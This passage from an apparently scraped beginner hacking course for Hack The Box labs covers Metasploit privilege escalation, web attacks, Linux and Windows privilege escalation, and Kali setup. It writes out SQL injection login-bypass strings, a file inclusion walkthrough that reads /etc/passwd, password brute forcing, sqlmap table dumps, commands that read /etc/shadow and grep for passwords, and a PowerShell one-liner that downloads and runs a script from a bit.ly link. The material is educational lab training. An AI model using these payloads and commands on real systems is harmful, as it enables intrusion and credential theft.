opened" followed by us getting an interactive Meterpreter session in msfconsole. 241 | 242 | ![](.gitbook/assets/image%20%2853%29.png) 243 | 244 | This is obviously enough called a _session._ When we use the exploit suggester, we already have a session 1 set up. If we press ctrl-z we are asked if we want to background our current session. Press y to do that. You are not back in the regular msfconsole, while your session is kept a`l`ive in the background. You can now do the following: 245 | 246 | `use post/multi/recon/local_exploit_suggester` 247 | 248 | `set session 1` 249 | 250 | `exploit` 251 | 252 | ![](.gitbook/assets/image%20%2844%29.png) 253 | 254 | Now that the suggester has done its job, you will probably get a couple of suggestions for exploits. There are ways to properly verify whether they will work, but that is out of scope for this guide. We recommend that you try each one of the exploits, by using the `use` command in msfconsole with the exploit path, setting the session to your current meterpreter session and running it by typing `exploit` as before. If you are lucky, it will spawn a new meterpreter session with elevated privileges. That means you have successfully escalated your privileges from a local user to a local administrator. You are now in full control of your target! 255 | 256 | * [https://www.rapid7.com/db/modules/post/multi/recon/local\_exploit\_suggester](https://www.rapid7.com/db/modules/post/multi/recon/local_exploit_suggester) 257 | * [https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/) 258 | 259 | ![](https://lh5.googleusercontent.com/P9kkB83xhsIMurqs2eIfvqmyUoUvl0SZ86SrZ1uwAXVSIfS4IltiCtg0xrdmy1TIWjcgxSnw95COoiz85FufBJ3UMHAApaunUnOTjULuUoksp2tmE92h-XWAI8dZH28mI72aKEZagL8) 260 | 261 | -------------------------------------------------------------------------------- /part-3-web-hacking.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Web hacking is essential hacker knowledge. You are already and will be exposed 4 | to a ton of different web services, and a lot of them can be exploited. 5 | --- 6 | 7 | # Part 3 - Web hacking 8 | 9 | ## What do you learn in this part? 10 | 11 | * General web concepts 12 | * Web vulnerabilities 13 | * Web hacking tools 14 | * Hacking some more boxes! 15 | 16 | **Boxes that are suitable for this part** 17 | 18 | * CronOS - 10.10.10.13 19 | * Shocker - 10.10.10.56 20 | 21 | **Bonus boxes** 22 | 23 | * Beep 24 | * Valentine 25 | 26 | ## **General web concepts** 27 | 28 | Before we start hacking the web, we need to know some basics about how the web works. A web service consists of a few different components. 29 | 30 | * **Web server** - the server that handles HTTP requests 31 | * **Web service** - is an application run by a web server, performing tasks and returning structured data to a calling program, rather than just static content. 32 | * **Content Management System \(CMS\)** - front end for serving content. Wordpress and Drupal are examples of CMSs. 33 | * **Web application** - Basically what you see on the screen 34 | 35 | ## Web vulnerabilities 36 | 37 | ### OWASP Top 10 38 | 39 | When you start your hacking journey you will probably hear talk about [The Open Web Application Security Project \(OWASP\) Top Ten](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_2017_Project). This is an anually reviewed overview of web application security risks worldwide. The most recent update is from 2017. Here are some important vulnerabilities you will see on HTB: 40 | 41 | * [Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection) 42 | * [Broken access control](https://www.owasp.org/index.php/Broken_Access_Control) 43 | * [Security misconfiguration](https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration) 44 | * [Using components with known vulnerabilities](https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities) 45 | 46 | ### **SQL Injections** 47 | 48 | SQL injection is one of the most common web hacking techniques. It usually occurs when a user is asked for input, like username and password, or a search field. Because what happens is that when you type in your username, a database statement is sent to the backend database. Sometimes, the input does not filter things like special characters, and hence we are able to manipulate the statements. 49 | 50 | Let's take an example. We have this login field, asking us to give our UserId, but instead of entering our UserId we put in some jazz. 51 | 52 | ![](.gitbook/assets/image%20%2815%29.png) 53 | 54 | What happens then is the program takes that input and puts it into a statement that asks the database. The statement becomes: 55 | 56 | `SELECT * FROM Users WHERE UserId = 105 OR 1=1;` 57 | 58 | **Why do we put 1=1?** The SQL statement above is valid and will return ALL rows from the "Users" table, since OR 1=1 is always TRUE. So if the Users table contains usernames and passwords, we can retrieve the entire thing. Quite dangerous! 59 | 60 | It's not always as easy as the example of course and sometimes we aren't really interested in extracting the entire database, but rather just getting past a login. These are some examples of quite simple SQL injections. Put this in username and/or password field, and see what happens. Maybe you will get lucky! 61 | 62 | * `admin' or '1'='1` 63 | * `admin'-- - " or ""="` 64 | * `' or 1=1 -- - '` 65 | * `union select 1,2,3 -- -` 66 | 67 | ### **File inclusions** 68 | 69 | A file inclusion is when we are able to access arbitrary files on the file system, through the web server. 70 | 71 | * Local file inclusion \(LFI\) - read files on the remote file system 72 | * Remote file inclsuion \(RFI\) - upload files to the file system 73 | 74 | LFI happens often in PHP and PHP based sites. Let's take an example from a simple website I've set up. This is at `index.php` which is basically the main part of the site. What we are going to explore is whether there are any parameters that have an LFI vulnerability. 75 | 76 | ![](.gitbook/assets/image%20%2854%29.png) 77 | 78 | Looks like a reagular site. So let's just add a `?page` to the URL and see what happens. You may now ask, "how did you know it was page?", which we will get back to how to find later in the course. 79 | 80 | ![](.gitbook/assets/image%20%2824%29.png) 81 | 82 | What is going on down there? Some nagging about `include php` and some error stuff. In PHP, the script is going to take a user supplied value and use it as a path to include a file, the value provided can however be modified. So instead of providing PHP with the file it expects, we say we want to include another file from the local file system. So what kind of file do we retrieve and how do we know where it's located? The answer is quite simple; we go for a file we know the path too and that is always present on the local file system. Since we can defer that this is a Linux from the `/var/www/index.php` path in the error message, we chose to get the **`/etc/passwd`** file which contains usernames. 83 | 84 | ![](.gitbook/assets/image.png) 85 | 86 | Huh? Why doesn't this work? Well, since the index.php file already resides in the `/var/www/` directory, we are now essentially trying to go to /var/www/etc/passwd which naturally doesn't exist. So we need to go back a few steps so we end up in the right directory. Maybe you remember from the Linux journey course that two dots `..` is like going backwards in the directories of the Linux file system. 87 | 88 | ![](.gitbook/assets/image%20%2842%29.png) 89 | 90 | Ok, you are probably getting annoyed now. Why do you keep showing us things that apparently don't work? Well, the answer is on the screen. If you read the error message closely you'll see that we now are trying to read a file `/etc/password.php` but the passwd file does not have a `php` file extension, so we need some way to remove it from our query. We use a little trick called null byte for this. It's a bug in older versions of PHP that allows to get rid of it. The null byte is url-encoded as `%00` so let's give this a shot. 91 | 92 | ![](.gitbook/assets/image%20%285%29.png) 93 | 94 | Finally! We are able to read the `passwd` file from the local file system of our target machine. As you can see the output is a bit jumbled, so we copy this out to our notes and format it neatly. 95 | 96 | Now we want you to try and imagine two things 97 | 98 | 1. What could i use these usernames for? 99 | 2. What other known files could be useful to retrieve? 100 | 101 | **Summary for file inclusions** 102 | 103 | Because the `page` parameter in the`index.php` code is not properly handled, we are now able to read arbitrary files on the filesystem, for example the `passwd` file which contains usernames. This is why it's so important to have knowledge of the Linux file system. 104 | 105 | RFI gives you LFI, but LFI doesn’t necessarily give you RFI. If you think you have found an LFI you can try to verify it with [fimap](https://tools.kali.org/web-applications/fimap). 106 | 107 | `fimap -u http://ip/file.php?path=..` 108 | 109 | But what files do we look for if we find a file inclusion error? Files containing usernames, passwords, source code, PHP files, perhaps even [SSH keys](http://blakesmith.me/2010/02/08/understanding-public-key-private-key-concepts.html). But we must know the file name and path! Therefore, learning enough about the file system to know [what files to look for](https://digi.ninja/blog/when_all_you_can_do_is_read.php) and where they are usually located is crucial. 110 | 111 | ### **Domain Name System \(DNS\)** 112 | 113 | #### **Adding a DNS entry** 114 | 115 | For some boxes on HTB, we have to manually add a DNS entry. What does this mean? When you enter a url into your web browser, DNS is the technology that translates the text address into an IP address for you. This is so we don't have to go around and remember IP addresses for websites we like to visit. Now, we can manually specify DNS entries, that means we say that, well we like this address, e.g. `lol.htb` to translate to `10.10.10.10`. We do this in Linix, by opening up the file called /etc/hosts in a text editor. Add an entry in a new line like this: `10.10.10.10 lol.thb` and save the file. Yes, just like that and nothing more. You can then navigate to lol.htb in your web browser and it will automatically translate `lol.htb` to the IP address `10.10.10.10.` 116 | 117 | The screenshot shows the `/etc/hosts` file opened in the vim editor in the terminal. As you can see, a DNS entry for `lol.htb` has been added to the file. This is a fictional machine and IP for the purpose of this example. 118 | 119 | ![](.gitbook/assets/image%20%2837%29.png) 120 | 121 | #### Zone transfer attack 122 | 123 | DNS Zone transfer is the process where a DNS server passes a copy of part of it's database \(which is called a "zone"\) to another DNS server. It basically allows us to make the server reveal some information about itself. We can exploit this to learn more about the system, and perhaps discover URLs to investigate. 124 | 125 | To dig up some more info about the domain, run this DNS query. This will of course only work on machines that have exposed DNS as a service externally. That basically means if you see that port 53 \(DNS\) is open, you can try this. Note that it might not always work, and you have to have a DNS entry added so your computer knows which DNS server to send the request to. 126 | 127 | `dig axfr @` 128 | 129 | ![](https://lh3.googleusercontent.com/32Uh7W3TrxMLpStYF19GXML61UU-qFLdKACaqfy_Za43mn-jGnoZs7VU0Fh_8KLCg0Rmk7aHf5tD3XkgWlAcZPPuD_ewG9AlveqrLNnlWU3AcbUjmIMSypaRVDYimUq2Rwhl_rO4SDg) 130 | 131 | ## **Web hacking tools** 132 | 133 | ### Curl and nikto 134 | 135 | These two are easy to run and is a good start when enumerating a web server for vulnerabilities. 136 | 137 | `curl -i ` - Downloads only the header of the URL you specify. 138 | 139 | `nikto -h ` - A web server scanner that tests for dangerous files, outdated server software and other problems. Can find vulnerabilities in web server versions as well. 140 | 141 | ### Burp 142 | 143 | Burp Suite is a professional tool for web hacking. It contains a ton of features and is extended with several plugins. This allows us to do pretty much everything we want towards web services and is used both by amateur hackers and penetration testing professionals every single day. Learning to use Burp efficiently is very important. 144 | 145 | #### Burp is a proxy 146 | 147 | A proxy is when you route network traffic somewhere else Burp captures the requests that we send to a website, and allows us to manipulate them in many ways In Firefox we can adjust proxy settings This is a bit clunky so the addon FoxyProxy is recommended. Install the Foxyproxy browser extension in [Firefox ](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/)or Chromium and add a new proxy with IP 127.0.0.1 and port 8080. This will send all the requests from your web browser into Burp. This is the standard proxy for Burp, so that your web requests will be sent to Burp, where you work with them in the interface. 148 | 149 | ![What Burp looks like. Not much going on here ... yet](.gitbook/assets/image%20%2849%29.png) 150 | 151 | Let's go through some of the features of Burp Suite. 152 | 153 | **Proxy - intercept requests** 154 | 155 | Here, I have set up the OWASP Juice Shop for the purpose of this demo. It's a little website running locally on my machine, hence the URL shows localhost on port 3000. As you can see, I have clicked the "intercept is on" button and it's now toggled on. That means every request in the web browser is intercepted in Burp and the web application hangs until i decide what to do. If we want, we can now edit any parameter in the request, forward, or drop it. 156 | 157 | ![A request has been intercepted](.gitbook/assets/image%20%2857%29.png) 158 | 159 | **Repeater - repeating requests** 160 | 161 | Same as proxy but you can repeat requests as many times as you want. Useful to try a web request numerous times and make changes. Below I have right clicked in the interface and selected "Send to Repeater". The Repeater tab flashes in orange. 162 | 163 | ![](.gitbook/assets/image%20%2827%29.png) 164 | 165 | Now I have gone to the Repeater tab and pressed "Go". It basically does exactly the same as "forward" in Proxy, but I can repeat it as many times as I want and make necessary adjusment. Very useful if you're trying to make some little element of your payload just right, like an SQL injection. 166 | 167 | ![](.gitbook/assets/image%20%2848%29.png) 168 | 169 | **Spider - find hidden directories and files** 170 | 171 | If we go to the target website and start clicking around, we should soon see that the Target tab in Burp starts filling up with different kinds of files and directories. This is basically called Spidering, a process of manually discovering content. This process can be automated to a certain extent with Burp. 172 | 173 | ![We've discovered a lot of stuff here!](.gitbook/assets/image%20%281%29.png) 174 | 175 | Now, we can right click on the URL and select "Spider this host". This will start an automatic scanning for directories and files, even recursively. Check the Spider tab for progress and to start and stop the spider. 176 | 177 | ![](.gitbook/assets/image%20%2839%29.png) 178 | 179 | 180 | 181 | **Intruder - brute forcing** 182 | 183 | The intruder is what you use to break the door in. It's the hammer of the Burp Suite. It allows us to not only do one request like the proxy, or many in a row like repeater, but actually as many as you want, and pretty quickly too! However, brute force is not always the best option, and if you chose to perform a brute force attack on a website you better be careful. 184 | 185 | Below I have toggled the interceptor on, and as you can seee my test username and password has been submitted. Remember, the request hasn't been sent yet, so hold your horses. Right click and press the "Send to Intruder" button. The Intruder tab starts flashing orange. 186 | 187 | ![](.gitbook/assets/image%20%282%29.png) 188 | 189 | If you navigate to the Positions tab, you'll see the request from before. Click the Clear button on the right hand to clear the markers that Burp set automatically. What we want to try are different passwords. At the moment I'm just going to assume that my test user is valid, which it probably is not. 190 | 191 | ![](.gitbook/assets/image%20%288%29.png) 192 | 193 | ![I'm ready to brute force the shit out of this password](.gitbook/assets/image%20%2838%29.png) 194 | 195 | Now we click the Payloads tab, because we need to specify a wordlist we want to brute force with. That means we are going to replace where I have written "password" with a ton of different common passwords, to see if any of them are valid. Burp has some built in lists that can be selected from the dropdown list, but Kali also has a lot of good wordlists in the`/usr/share/wordlists` directory that you can try. For now, let's just select a Burp list. 196 | 197 | {% hint style="info" %} 198 | One of the most common lists for brute force attacks is called `rockyou`. It contains 14+ million passwords and is built into Kali. However, brute forcing with such a list will take ages. You can find it at`/usr/share/wordlists/rockyou.txt` 199 | {% endhint %} 200 | 201 | ![Ready to hack](.gitbook/assets/image%20%2810%29.png) 202 | 203 | Now I am going to click "Start attack" and it will start brute forcing this password. As you can see, I will try 3424 different passwords. Quite intensive! 204 | 205 | ![](.gitbook/assets/image%20%287%29.png) 206 | 207 | Looks like I'm not having so much luck on the first 723 guesses. How can I tell? Well, the status code should not be in the 400-category as these are commonly errors like "401 Unathorized" as you can see in the Response tab. I would want to get something like "200 OK" which means the request was fulfilled. 208 | 209 | So I could let this complete, but most likely my username is not correct. Until you get more experience with Burp, only attempt bruteforcing either username of password at once. In most cases, that means you'll need to figure out a username some other way. 210 | 211 | If you are interested in learning more about the features of Burp, a very good [Burp Tutorial series](https://www.youtube.com/playlist?list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA) is available on Youtube. 212 | 213 | ### **Busting directores** 214 | 215 | Sometimes we have a web server on `www.lol.htb`, but what if all the secret passwords are stored at `www.lol.htb/secret_passwords`? How do we access them, if there is no link on the web page to the directory? Very often, web site administrators have not been able to properly hide or restrict access to every file and directory on their service. Therefore, we need to do some educated guessing, by trying common files and directories. This is a very common task, so we have very good tools for this! 216 | 217 | #### Dirbuster 218 | 219 | Use dirb to find directories on a web server. You can also use the GUI version called dirbuster. Just search for it in Kali. The terminal version is called dirb. We recommend you try them both. 220 | 221 | `dirb ` 222 | 223 | Kali comes with a lot of good wordlists. This one is very good and reliable to find most stuff.`/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt` 224 | 225 | #### Dirsearch 226 | 227 | Dirbuster isn't always the fastest. If you start noticing it's restrictions, we suggest you test dirsearch. You can clone it from Github with 228 | 229 | `git clone` [`https://github.com/maurosoria/dirsearch`](https://github.com/maurosoria/dirsearch)\`\` 230 | 231 | You then run it with the follwoing command, where the IP/URL and port must be set. 232 | 233 | `python3 dirsearch.py -u http://ip:port -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php -t 100` 234 | 235 | Remember to try different extensions like `.py .pl .cgi` and `.sh`. What this does is add an extension to every word in the wordlist in addition to just searching for the directories. So you will try both `http://lol.htb/secret` and`http://lol.htb/secret.php` You might discover a lot of interesting files this way. Also, remember to try relevant file extensions. If you are uncertain what kind of extensions to use, look at the type of web services that are running and Google around for what kind of extensions are used. For example you might learn that IIS servers very often use `asp` and `aspx` extensions, while content managers such as Wordpress relies on ~~`php`~~. 236 | 237 | ### SQLmap - exploiting SQL injections automatically 238 | 239 | SQLmap is one of our absolute favorite hacking tools. It's immensely powerful to the extent that even if you sat down and learnt every option in the program you would still have a lot to learn. It automatically performs every kind of SQL injection you can imagine and even allows you to get a shell on the system straight from the program. Quite fun indeed! 240 | 241 | This is pretty much the route we take when working with databases and injections. It is all built in a very neat hierarchy. 242 | 243 | 1. **DBMS** = database management system. e.g. MySQL, Postgresql, MSSQL 244 | 2. **Databases** - the actual databases that contains the content. You can have many databases in one DBMS. 245 | 3. **Tables** - A database can have many tables 246 | 4. **Columns** - A table can have many columns 247 | 5. **Rows** - this is usually where you will find your username and password 248 | 249 | #### **How to exploit an SQL injection with SQLMap** 250 | 251 | Capture a request with Burp and copypaste it. Save it to a file `r.txt` Then execute sqlmap by pointing to the request. It will then automatically start injecting where it deems fit. Here I am going to use an example site I have set up. As you can see I have a PHP file that takes a parameter `id`. Now instead of typing just `1`, I have added a `'` at the end. What happens is that the SQLstatement is manipulated by this `'` and we get an SQL error from the backend server. This indicated that an SQL injection may be possible. 252 | 253 | ![](.gitbook/assets/image%20%2829%29.png) 254 | 255 | Let's capture the request with Burp and save it with the filename `request.txt` 256 | 257 | ![](.gitbook/assets/image%20%2851%29.png) 258 | 259 | Let's fire up our terminal and start sqlmap to see if it detects the potential SQL injection. 260 | 261 | `sqlmap -r request.txt` 262 | 263 | If it finds a parameter to inject, you will most likely be told so and SQLmap will reveal what kind of DBMS is present. Here we can see it very quickly found that the `id` parameter was injectable and that the DBMS is `MySQL`. 264 | 265 | ![](.gitbook/assets/image%20%2859%29.png) 266 | 267 | Now we are going to continue down the hierarchy indicated above. So just cancel this with `Ctrl+C`. We now specify that the DBMS is MySql and say that we want to extract the databases using the --dbs parameter. This could take some time, because it is trying a lot of payloads. 268 | 269 | `sqlmap -r request.txt --dbms=mysql --dbs` 270 | 271 | ![](.gitbook/assets/image%20%2852%29.png) 272 | 273 | You will ocasionally get prompted for input. The capital N means it's the default option, so you can just click enter to move on. The default selections in SQLmap are usually sensible. 274 | 275 | Now look in the screenshot above. We see that sqlmap automatically used some more advanced payloads to retrieve the name of two databases. The `information_schema` db is a default db in Mysql, so let's focus on the one called `photoblog`. Let's specify that we want to extract the tables from it. 276 | 277 | `sqlmap -r request.txt--dbms=mysql -D photoblog --tables` 278 | 279 | ![](.gitbook/assets/image%20%2828%29.png) 280 | 281 | And we just keep digging ourselves down this rabbit hole. As you can see, we have three tables in the database and one of them is called users. Let's just **dump** all the content of that table with the `--dump` option. 282 | 283 | `sqlmap -r request.txt --dbms=mysql -D photoblog -T users --dump` 284 | 285 | ![](.gitbook/assets/image%20%2813%29.png) 286 | 287 | To be nice I have censored the hashed password of the admin, but as you can see we end up with a complete dump of all the columns and rows in the `users` table in the `photoblog`database that is hosted on a `mysql` dbms. And we barely did anything but type some lines and press enter! Do you know realize the power of Sqlmap? Magic! 288 | 289 | ![](.gitbook/assets/image%20%2814%29.png) 290 | 291 | 292 | 293 | -------------------------------------------------------------------------------- /part-4-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: How to escalate your privileges to gain administrative access on a system 3 | --- 4 | 5 | # Part 4 - Privilege escalation 6 | 7 | ## What do you learn in this part? 8 | 9 | * Privilege escalation 10 | * Windows 11 | * Linux 12 | 13 | **Boxes that are suitable for this part** 14 | 15 | * Nibbles - 10.10.10.75 16 | * Bashed - 10.10.10.68 17 | 18 | **Other boxes** 19 | 20 | * Celestial 10.10.10.85 21 | * Jerry 10.10.10.95 22 | 23 | ## **Privilege escalation** 24 | 25 | > Everybody wants to be a hacker, but nobody wants to read no damn man page - Chris 26 | 27 | ### The goal 28 | 29 | * Linux - Becoming root, id 0 30 | * Windows - Becoming NT AUTHORITY\SYSTEM or Administrator 31 | 32 | What does it mean? Very often on Hackthebox and in real pentests we end up getting access to a system as a regular user or service account. This access always has a certain level of privilege on the system you are on. Most regular users are low privileged, that means they can't perform adminsitrative tasks, e.g. disable the antivirus, install new software, or open ports. Our goal is to get the highest level of privilege possible. In Windows that is called Administrative privilege and in Linux its called root or super user privilege. 33 | 34 | ## **Windows privilege escalation** 35 | 36 | ### Credential reuse 37 | 38 | Sometimes a user that you have the credentials for is also the administrator on the system, but uses the same password for both accounts. So never forget to try passwords when you have the chance. Just don't overdo it so you trigger some lockout mechanism and get detected. 39 | 40 | Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group. As you can see from the output of the three commands below the username is _hacker_, he is part of the group _administrators._ In this case, a privilege escalation is not necessary because we are already in the administrators group! 41 | 42 | * `whoami` 43 | * `net localgroup administrator` 44 | * `net user "%username%"` 45 | 46 | ![](.gitbook/assets/image%20%2832%29.png) 47 | 48 | ### Kernel exploits 49 | 50 | Metasploit exploit suggester can be used to find kernel exploits in Windows. That means exploits that allow for local privilege escalation from user and service accounts to administrator or SYSTEM. We don't cover it here as it was thoroughly covered in [Part 1 - How to hack ](part-1-how-to-hack.md#4-privilege-escalation)[\#Privilege Escalation](part-1-how-to-hack.md#4-privilege-escalation) 51 | 52 | Run `systeminfo` or `sysinfo` to get some information about the OS installed hotfixes. If no hotfixes installed, few or no patches are installed, which means it is probably vulnerable to kernel vulnerabilites. Hence, privilege escalation using kernel exploits could be possible. 53 | 54 | ### PowerUp 55 | 56 | PowerUp is an extremely useful script for quickly checking for obvious paths to privilege escalation on Windows. It is not an exploit itself, but it can reveal vulnerabilities such as administrator password stored in registry and similar. We shamelessly use [harmj0y's guide](https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/) as reference point for the following guide. Some basic knowledge about how to import Powershell modules and used them is required. 57 | 58 | Import the PowerUp module with the following: 59 | 60 | `PS C:\>` **`Import-Module PowerUp.ps1`** 61 | 62 | If you want to invoke everything without touching disk, use something like this: 63 | 64 | `C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks”` 65 | 66 | 67 | 68 | ### Finding stuff fast 69 | 70 | `findstr /s /C:"stringtosearchfor.txt" "C:*"` 71 | 72 | ### Service account escalation \(potato\) 73 | 74 | There are several known techniques to escalate from service accounts to SYSTEM. The details of this exploit are slightly out of scope for what's supposed to be an entry level guide to hacking, but we chose to include it because it has saved us numerous times and because @decoder does such a good job with it. [https://decoder.cloud/2017/12/23/the-lonely-potato/](https://decoder.cloud/2017/12/23/the-lonely-potato/) 75 | 76 | ## **Linux privilge escalation** 77 | 78 | ### Sudo 79 | 80 | What is sudo? 81 | 82 | `sudo` is a command you will probably see a lot in the Linux world. It allows regular users to perform certain tasks as root user. This is useful for performing administrative tasks without switching to the root user all the time. It requires that the user has been added to the sudoers group. Of course we should abuse this. Try `sudo -l` to find the commands the user you currently can run as sudo. 83 | 84 | ### Linux permissions 85 | 86 | In Linux, everything is a file. All files have owners and access permissions and we use that to our advantage 87 | 88 | `ls -l Desktop/` 89 | 90 | `-rwxr-xr-x 2 chris meme.jpg 4096 Dec 1 11:45 .` 91 | 92 | This permissions indication is grouped into three categories: owner, group, world in that order. For each of those three a read, write and execute permission is set. Owner simply means the owner of the file, group means access to the file through being member of the appropriate group and world simply means any user on the system. 93 | 94 | `| rwx | r-x | x` 95 | 96 | Changing permissions to writable for the owner. 97 | 98 | `chmod +w script.sh` 99 | 100 | ### Confidential information and users 101 | 102 | `id` 103 | 104 | `su` 105 | 106 | `sudo -l` 107 | 108 | `cat /etc/passwd` 109 | 110 | `cat /etc/shadow` 111 | 112 | `cat /etc/group` 113 | 114 | `cat /etc/sudoers` 115 | 116 | `ls -alh /var/mail/` 117 | 118 | `ls -ahlR /root` 119 | 120 | `ls -ahlR /home/` 121 | 122 | ### Cron jobs - scheduled jobs that run every min/hour/day 123 | 124 | `ls -al /etc/cron` 125 | 126 | `cat /etc/cron` 127 | 128 | `crontab -l` 129 | 130 | If root runs a backup every other minute, what can we do? If it is a file or directory, we can hijack it if we have write permissions 131 | 132 | ### World writable files and folders 133 | 134 | `find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print` 135 | 136 | `find / -writable -type d 2>/dev/null` 137 | 138 | #### Generally interesting directories 139 | 140 | `ls -la /*` 141 | 142 | `ls -la /var/log` 143 | 144 | `ls -la /var/mail` 145 | 146 | `ls -la /var/www/` 147 | 148 | `ls -la /opt` 149 | 150 | ### Find interesting files and directories fast 151 | 152 | `find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)` 153 | 154 | `grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)` 155 | 156 | ### SUID files / binaries 157 | 158 | The file will run as the owner no matter who executes it. So if root owns it, we can run it and hijack it to become root 159 | 160 | `find / -perm -u=s -type f 2>/dev/null` 161 | 162 | ### Look for Linux kernel exploits 163 | 164 | First find what kernel and distro you are running. Then use searchsploit to identify whether there are any exploits available for privilege escalation 165 | 166 | `uname -a 167 | cat /etc/*-release 168 | cat /etc/issue` 169 | `searchsploit kernel` 170 | 171 | Here you can see how we can find local privilege escalation exploits from Exploit-DB. If you look in the path on the right hand pane you can see some of them have "local" in the path, which means they are local privilege escalation exploits, which are those we want. Those that have "dos" in the path are for denial of service attacks, which won't be relevant. Note that kernel exploits are prone to crashing the operating system, so be very careful with running these. Make attempts to exhaust other alternatives before turning to kernel exploits. 172 | 173 | ![](.gitbook/assets/image%20%2845%29.png) 174 | 175 | ### Check running services and installed applications 176 | 177 | `ps -ef cat /etc/services 178 | dpkg -l rpm -qa` 179 | 180 | An example here is for instance that you see a local database like mysql is running. Maybe you are able to find credentials for it and log into it locally on the box. 181 | 182 | -------------------------------------------------------------------------------- /preparation.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | The purpose of this chapter is to make sure you have a fully functional Kali 4 | Linux. It estimately takes an hour or two to get set up, depending on skill 5 | level with virtualization and with Linux. 6 | --- 7 | 8 | # Preparation 9 | 10 | ## Goal 11 | 12 | * Kali Linux running as a virtual machine \(VM\) in either Virtualbox, Hyper-V or VMware Workstation/Player 13 | * VM must be able to enter fullscreen mode 14 | * Working coypaste of files and text between Kali and host operation system 15 | * Working VPN access to HTB 16 | * Acquite some basic Linux terminal skills 17 | 18 | ### **1 - Join the social channel** 19 | 20 | There is an official [Hackthebox Discord](https://discord.gg/BpWsXza). There is also a dedicated Hackthebox channel in the [Netsecfocus MM](https://mm.netsecfocus.com/join). Both have a lot of hackers eager to assist if you ask nicely. 21 | 22 | ### **2 - Install virtualization software** 23 | 24 | You need to run Kali Linux as a virtual machine on your computer. There are a few software alternatives for working with virtual machines \(VMs\). You can use whatever host operating system you like as long as you feel comfortable installing the required software. The "host" operating system is the one installed on your laptop. The "guest" is the virtual machine operating system. 25 | 26 | * [Virtualbox ](https://www.virtualbox.org/)- free 27 | * [VMware Player](https://www.vmware.com/products/workstation-player.html) - free 28 | * [VMware Workstation Pro](https://www.vmware.com/products/workstation-pro.html) - paid 29 | * [VMWare Fusion ](https://www.vmware.com/products/fusion.html)- paid, for MacOS 30 | * [Hyper-V](https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v) - preinstalled in Windows 10, but must be enabled. Linux support is not great, so this guide won't cover it as it relies on Kali Linux. 31 | 32 | ### **3 - Install Kali Linux** 33 | 34 | [Kali Linux](https://www.kali.org) is a Linux distribution maintained by Offensive Security. They provide pre-installed VMs you can import straight into your virtualization software and run instantly without having to install anything. If you chose to install it manually you are free to do so. 35 | 36 | * [Download a Kali VM](https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/) appropriate for your virtualization software of choice, see step 2. You want a 64-bit version, not x86/32-bit 37 | * [Kali Linux Vm 64 Bit Ova](https://images.offensive-security.com/virtual-images/kali-linux-2018.3-vm-amd64.ova) if you use VMware 38 | * File -> Open -> _Select the Kali ovf file you downloaded_ -> Open 39 | * [Kali Linux Vbox 64 Bit Ova](https://images.offensive-security.com/virtual-images/kali-linux-2018.3-vbox-amd64.ova) if you use Virtualbox 40 | * File > Import Appliance > _Select the Kali ova file you downloaded_ > Import 41 | * You do not need to create a new user in Kali Linux. The root user is sufficient for this guide and will make installation of software work without using the `sudo` command. 42 | 43 | ### **4 - Make copypaste and fullscreen work** 44 | 45 | Without copypaste between guest and host OS and fullscreen, hacking is gonna become a bit tiresome. So we highly recommend you get this working before you start. You need what's called guest additions to be able to do these things. We recommend using the packages available through the package manager in Kali. The package depends on whether you use Virtualbox or VMware. 46 | 47 | #### Virtualbox 48 | 49 | Run the following command, make sure it installs and reboot the guest OS \(Kali\) afterwards. 50 | 51 | `apt install -y virtualbox-guest-x11` 52 | 53 | #### VMware 54 | 55 | Run the following command, make sure it installs and then reboot the guest OS afterwards. 56 | 57 | `apt install open-vm-tools open-vm-tools-desktop` 58 | 59 | #### Hyper-V 60 | 61 | You are on your own here. Hyper-V generally doesn't have support for direct copypaste between host and guest OS. 62 | 63 | #### Troubleshooting 64 | 65 | * Reboot guest OS 66 | * Reboot host OS 67 | * Reinstall the guest tools 68 | * Worst case: reinstall Kali in a new virtual machine 69 | 70 | ### 5 - Register to Hackthebox \(HTB\) 71 | 72 | HTB has a challenge to get an invite code where you have to "hack" it. We won't spoil it, so you are on your own here. If you struggle, ask in the social channel for hints. They change this challenge from time to time to prevent people from spoiling the solution, so solutions from Google and Youtube may not help you here. Click the link below to start hacking your way in to HTB! 73 | 74 | [Join Hackthebox](https://www.hackthebox.eu/invite) 75 | 76 | Once you've gotten past the challenge, you can register and start navigating around the Hackthebox website. HTB will be explained in further detail later in this guide, so don't start worrying if you feel a bit lost. 77 | 78 | ### 6 - Connect to HTB using VPN 79 | 80 | We are now going to use VPN to connect to the HTB lab. With VPN it will be just as if your Kali Linux box is connected to the same network as the lab. That way we can interact directly with the machines in the lab. We are going to need the software called `openvpn` and a personal VPN config file we download from HTB. 81 | 82 | #### Do the following from Kali Linux 83 | 84 | * Install openvpn with `apt install openvpn` 85 | * Click the _Access_ menu in the left side menu on HTB 86 | 87 | ![](.gitbook/assets/screenshot-2018-09-12-at-09.27.02%20%281%29.png) 88 | 89 | * Click _Connection Pack_. This downloads a VPN config file to your downloads folder, which should be named something like `your_htb_username.ovpn` 90 | 91 | ![](.gitbook/assets/screenshot-2018-09-12-at-09.28.21.png) 92 | 93 | * Connect to HTB with `openvpn` `openvpn /root/Downloads/username.ovpn` 94 | 95 | 